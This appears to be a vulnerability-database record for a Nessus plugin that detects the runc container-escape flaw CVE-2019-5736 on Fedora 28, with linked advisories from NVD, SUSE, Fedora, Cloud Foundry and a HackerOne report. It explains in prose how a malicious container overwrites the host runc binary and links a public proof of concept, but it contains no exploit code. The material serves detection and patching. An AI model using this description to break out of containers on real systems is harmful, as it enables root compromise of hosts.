{"id": "FEDORA_2019-829524F28F.NASL", "bulletinFamily": "scanner", "title": "Fedora 28 : moby-engine (2019-829524f28f)", "description": "CVE-2019-5736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2019-02-19T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/122283", "reporter": "This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2019-829524f28f"], "cvelist": ["CVE-2019-5736"], "type": "nessus", "lastseen": "2021-02-01T02:33:25", "edition": 20, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-5736"]}, {"type": "f5", "idList": ["F5:K46421255"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC"]}, {"type": "hackerone", "idList": ["H1:495495"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0201-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2245-1", "OPENSUSE-SU-2019:0252-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191061", "OPENVAS:1361412562310876139", "OPENVAS:1361412562310875467", "OPENVAS:1361412562310852826", "OPENVAS:1361412562310875688", "OPENVAS:1361412562310876761", "OPENVAS:1361412562310852319", "OPENVAS:1361412562310876767", "OPENVAS:1361412562310875978", "OPENVAS:1361412562310876766"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2019-0303.NASL", "RANCHEROS_1_5_1.NASL", "FEDORA_2019-FD9345F44A.NASL", "FEDORA_2019-3F19F13ECD.NASL", "ORACLELINUX_ELSA-2019-0975.NASL", "FEDORA_2019-C1DAC1B3B8.NASL", "FEDORA_2019-352D4B9CD8.NASL", "FEDORA_2019-F455EF79B8.NASL", "FEDORA_2019-4DC1E39B34.NASL", "FEDORA_2019-DF2E68AA6B.NASL"]}, {"type": "virtuozzo", "idList": ["VZA-2019-008"]}, {"type": "fedora", "idList": ["FEDORA:7FBE46071258", "FEDORA:D35EC607603A", "FEDORA:1308F60C4220", "FEDORA:E1B606076F4E", "FEDORA:1D3BD6049C24", "FEDORA:6381060486F6", "FEDORA:0907F624D00F", "FEDORA:813AC604EC12", "FEDORA:E3C59624D00E", "FEDORA:421346101A44"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-0975"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465"]}, {"type": "archlinux", "idList": ["ASA-201902-6", "ASA-201902-20"]}, {"type": "threatpost", "idList": ["THREATPOST:B4C48A638705549FED64000361BA8526"]}, {"type": "thn", "idList": ["THN:B0FC327500C590C565FC4F46D8DCDD34"]}, {"type": "exploitdb", "idList": ["EDB-ID:46369", "EDB-ID:46359"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB"]}, {"type": "redhat", "idList": ["RHSA-2019:0408", "RHSA-2019:0303", "RHSA-2019:0401", "RHSA-2019:0304", "RHSA-2019:0975"]}, {"type": "amazon", "idList": ["ALAS-2019-1156"]}, {"type": "vmware", "idList": ["VMSA-2019-0001"]}, {"type": "zdt", "idList": ["1337DAY-ID-32182", "1337DAY-ID-32165"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1"]}, {"type": "cisco", "idList": ["CISCO-SA-20190215-RUNC"]}], "modified": "2021-02-01T02:33:25", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-02-01T02:33:25", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-829524f28f.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122283);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/23 11:21:11\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"FEDORA\", value:\"2019-829524f28f\");\n\n script_name(english:\"Fedora 28 : moby-engine (2019-829524f28f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2019-5736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-829524f28f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moby-engine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moby-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"moby-engine-18.06.0-2.ce.git0ffa825.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moby-engine\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "122283", "cpe": ["p-cpe:/a:fedoraproject:fedora:moby-engine", "cpe:/o:fedoraproject:fedora:28"], "scheme": null, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}}

{"cve": [{"lastseen": "2021-02-02T07:13:02", "description": "runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.", "edition": 26, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-02-11T19:29:00", "title": "CVE-2019-5736", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5736"], "modified": "2020-11-16T20:46:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:hci_management_node:-", "cpe:/o:fedoraproject:fedora:29", "cpe:/a:redhat:container_development_kit:3.7", "cpe:/o:fedoraproject:fedora:30", "cpe:/a:microfocus:service_management_automation:2018.02", "cpe:/o:opensuse:leap:15.1", "cpe:/a:microfocus:service_management_automation:2018.05", "cpe:/a:linuxfoundation:runc:0.1.1", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:opensuse:leap:42.3", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:microfocus:service_management_automation:2018.08", "cpe:/o:canonical:ubuntu_linux:19.04", "cpe:/a:netapp:solidfire:-", "cpe:/a:linuxfoundation:runc:1.0.0", "cpe:/a:redhat:openshift:3.6", "cpe:/a:google:kubernetes_engine:-", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:redhat:enterprise_linux:8.0", "cpe:/a:redhat:openshift:3.5", "cpe:/a:redhat:openshift:3.4", "cpe:/a:redhat:openshift:3.7", "cpe:/a:microfocus:service_management_automation:2018.11", "cpe:/a:hp:onesphere:-"], "id": "CVE-2019-5736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:0.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "cpe:2.3:a:google:kubernetes_engine:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:redhat:openshift:3.6:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:-:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc6:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:onesphere:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:container_development_kit:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.11:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.05:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.02:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.08:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:36", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-01T22:35:00", "published": "2019-03-01T22:35:00", "id": "F5:K46421255", "href": "https://support.f5.com/csp/article/K46421255", "title": "Docker privilege elevation vulnerability CVE-2019-5736", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:49", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "# \n\n## Severity\n\nHigh\n\n## Vendor\n\nOpen Container Initiative\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is High unless otherwise noted._\n\n * BPM\n * All prior to v1.0.3\n * Cloud Foundry Container Runtime (CFCR)\n * All versions prior to v0.29.0\n * Docker BOSH Release \n * All versions prior to v34.0.0\n * Garden runC\n * All versions prior to v1.18.2\n\n## Description\n\nThe vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn\u2019t matter if the command is not attacker-controlled) as root within a container in either of these contexts:\n\n* Creating a new container using an attacker-controlled image.\n\n* Attaching (docker exec) into an existing container which the attacker had previous write access to.\n\nThis vulnerability is *not* blocked by the default AppArmor policy, nor by the default SELinux policy on Fedora[++] (because container processes appear to be running as container_runtime_t). However, it *is* blocked through correct use of user namespaces (where the host root is not mapped into the container\u2019s user namespace).\n\nNOTE: The Garden-runC implementation used in Cloud Foundry is not impacted by this vulnerability because it leverages unprivileged containers and user namespaces. Garden has consumed the upstream fix in version v1.18.2 to ensure all redundant security controls remain functional.\n\n## Mitigation\n\nUsers of affected versions should apply the following mitigations or upgrades:\n\n * Releases that have fixed this issue include:\n * BPM: v1.0.3\n * Cloud Foundry Container Runtime (CFCR): v0.29.0\n * Docker BOSH Release: v34.0.0\n * Garden runC: v1.18.2\n\n## References\n\n * * [CVE Announcement](<https://groups.google.com/a/opencontainers.org/forum/#!topic/dev/Tc1ELm-8oDI>)\n * [CVE-2019-5736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5736>)\n\n## History\n\n2019-02-14: Added fixed version for Cloud Foundry Container Runtime (CFCR)\n\n2019-02-13: Initial vulnerability report published\n", "edition": 4, "modified": "2019-02-13T00:00:00", "published": "2019-02-13T00:00:00", "id": "CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC", "href": "https://www.cloudfoundry.org/blog/cve-2019-5736/", "title": "CVE-2019-5736:\u00a0runC container breakout | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-09-26T21:32:55", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2019-5736"], "description": "description here: \nhttps://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html\nPoC: https://github.com/q3k/cve-2019-5736-poc\n\nSome more links:\nhttps://seclists.org/oss-sec/2019/q1/119\nhttps://access.redhat.com/security/cve/cve-2019-5736\n\n## Impact\n\nIt allows to escape from container to root on host when unpatched version of Docker and Kubernetes are used.\nThis affects a pretty big part of internet, since a lot of services are using Docker and Kubernets these days.\nIt has also serious impact on cloud services\nAWS https://aws.amazon.com/security/security-bulletins/AWS-2019-002/ and GCP https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc\nhttps://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/", "modified": "2019-09-26T20:35:06", "published": "2019-02-13T18:50:11", "id": "H1:495495", "href": "https://hackerone.com/reports/495495", "type": "hackerone", "title": "The Internet: CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2019-10-03T20:27:36", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for lxc fixes the following issues:\n\n Update to lxc 3.2.1. The changelog can be found at\n\n <a rel=\"nofollow\" href=\"https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322\">https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322</a>\n\n + seccomp: support syscall forwarding to userspace\n + add lxc.seccomp.allow_nesting\n + pidfd: Add initial support for the new pidfd api\n * Many hardening improvements.\n * Use /sys/kernel/cgroup/delegate file for cgroup v2.\n * Fix CVE-2019-5736 equivalent bug.\n\n - fix apparmor dropin to be compatible with LXC 3.1.0 (boo#1131762)\n\n", "edition": 1, "modified": "2019-10-03T18:20:43", "published": "2019-10-03T18:20:43", "id": "OPENSUSE-SU-2019:2245-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00007.html", "title": "Security update for lxc (moderate)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-07T22:28:25", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for lxc fixes the following issues:\n\n Update to lxc 3.2.1. The changelog can be found at\n\n <a rel=\"nofollow\" href=\"https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322\">https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322</a>\n\n + seccomp: support syscall forwarding to userspace\n + add lxc.seccomp.allow_nesting\n + pidfd: Add initial support for the new pidfd api\n * Many hardening improvements.\n * Use /sys/kernel/cgroup/delegate file for cgroup v2.\n * Fix CVE-2019-5736 equivalent bug.\n\n - fix apparmor dropin to be compatible with LXC 3.1.0 (boo#1131762) This\n update was imported from the openSUSE:Leap:15.1:Update update project.\n\n", "edition": 1, "modified": "2019-10-07T21:18:10", "published": "2019-10-07T21:18:10", "id": "OPENSUSE-SU-2019:2286-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00029.html", "title": "Security update for lxc (moderate)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-27T15:30:10", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-02-27T12:17:02", "published": "2019-02-27T12:17:02", "id": "OPENSUSE-SU-2019:0252-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00071.html", "title": "Security update for docker-runc (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-19T01:01:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2019-02-18T21:26:39", "published": "2019-02-18T21:26:39", "id": "OPENSUSE-SU-2019:0201-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00044.html", "title": "Security update for docker-runc (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-05-03T03:43:36", "published": "2019-05-03T03:43:36", "id": "FEDORA:D35EC607603A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: runc-1.0.0-92.dev.gitc1b8c57.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This me ans they can run anywhere, from your laptop to the largest EC2 compute instance and everything in between - and they don't require you to use a particular language, framework or packaging system. That makes them great building blo cks for deploying and scaling web apps, databases, and backend services without depending on a particular stack or provider. ", "modified": "2019-02-19T05:54:38", "published": "2019-02-19T05:54:38", "id": "FEDORA:E1B606076F4E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: moby-engine-18.06.0-2.ce.git0ffa825.fc28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. The python3-lxc package contains the Python3 binding for LXC. ", "modified": "2019-09-06T12:59:40", "published": "2019-09-06T12:59:40", "id": "FEDORA:6381060486F6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: python3-lxc-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-05-03T01:00:03", "published": "2019-05-03T01:00:03", "id": "FEDORA:1D3BD6049C24", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: runc-1.0.0-92.dev.gitc1b8c57.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This me ans they can run anywhere, from your laptop to the largest EC2 compute instance and everything in between - and they don't require you to use a particular language, framework or packaging system. That makes them great building blo cks for deploying and scaling web apps, databases, and backend services without depending on a particular stack or provider. ", "modified": "2019-02-19T14:04:24", "published": "2019-02-19T14:04:24", "id": "FEDORA:813AC604EC12", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: moby-engine-18.06.0-2.ce.git0ffa825.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-02-21T01:39:49", "published": "2019-02-21T01:39:49", "id": "FEDORA:3A64160C815D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: runc-1.0.0-68.dev.git6635b4f.fc28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "LXCFS is a simple userspace filesystem designed to work around some current limitations of the Linux kernel. Specifically, it's providing two main things - A set of files which can be bind-mounted over their /proc originals to provide CGroup-aware values. - A cgroupfs-like tree which is container aware. The code is pretty simple, written in C using libfuse. The main driver for this work was the need to run systemd based containers as a regular unprivileged user while still allowing systemd inside the container to interact with cgroups. Now with the introduction of the cgroup namespace in the Linux kernel, that part is no longer necessary on recent kernels and focus is now on making containers feel more like a real independent system through the proc masking feature. ", "modified": "2019-09-06T12:59:40", "published": "2019-09-06T12:59:40", "id": "FEDORA:37FA36077DE7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: lxcfs-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. ", "modified": "2019-09-06T12:59:39", "published": "2019-09-06T12:59:39", "id": "FEDORA:B42946075886", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: lxc-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "LXCFS is a simple userspace filesystem designed to work around some current limitations of the Linux kernel. Specifically, it's providing two main things - A set of files which can be bind-mounted over their /proc originals to provide CGroup-aware values. - A cgroupfs-like tree which is container aware. The code is pretty simple, written in C using libfuse. The main driver for this work was the need to run systemd based containers as a regular unprivileged user while still allowing systemd inside the container to interact with cgroups. Now with the introduction of the cgroup namespace in the Linux kernel, that part is no longer necessary on recent kernels and focus is now on making containers feel more like a real independent system through the proc masking feature. ", "modified": "2019-09-06T12:35:28", "published": "2019-09-06T12:35:28", "id": "FEDORA:E3C59624D00E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: lxcfs-3.0.4-1.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. ", "modified": "2019-09-06T12:35:28", "published": "2019-09-06T12:35:28", "id": "FEDORA:7FBE46071258", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: lxc-3.0.4-1.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-11T09:22:07", "description": "A vulnerability was discovered in runc, which is used by Docker to run\ncontainers. runc did not prevent container processes from modifying\nthe runc binary via /proc/self/exe. A malicious container could\nreplace the runc binary, resulting in container escape and privilege\nescalation. This was fixed by creating a per-container copy of\nrunc.(CVE-2019-5736)", "edition": 19, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-12T00:00:00", "title": "Amazon Linux AMI : docker (ALAS-2019-1156)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:docker", "p-cpe:/a:amazon:linux:docker-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1156.NASL", "href": "https://www.tenable.com/plugins/nessus/122096", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory 